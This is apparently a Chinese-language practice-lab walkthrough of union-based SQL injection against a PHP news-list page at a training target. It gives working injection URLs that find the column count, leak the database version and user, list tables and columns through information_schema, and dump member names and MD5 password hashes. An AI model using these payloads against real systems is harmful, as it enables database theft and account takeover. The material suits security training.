测试注入点
http://124.70.64.48:40014/new_list.php?id=1sdaf
不显示,说明存在注入点
order by
http://124.70.64.48:40014/new_list.php?id=1%20order%20by%205
报错猜解准备
查询信息(联合注入)(注意 id=后面需要用个错误的值,如-1)(version(),user(),database(),@@version_compile_os)http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,2,3,4
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,version(),database(),4
得到其信息分别为:
查表得(StormGroup_member,notice)version() 5.7.22-0ubuntu0.16.04.1
database() mozhe_Discuz_StormGroup
user() root@localhost
@@version_compile_os Linux
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(table_name)%20,3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
5.查列得(id,name,password,status)
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(column_name)%20,3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27
6.查具体信息得账号密码,密码需MD5解密,然后登录后得key
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member
7.emmm,最后登录不上去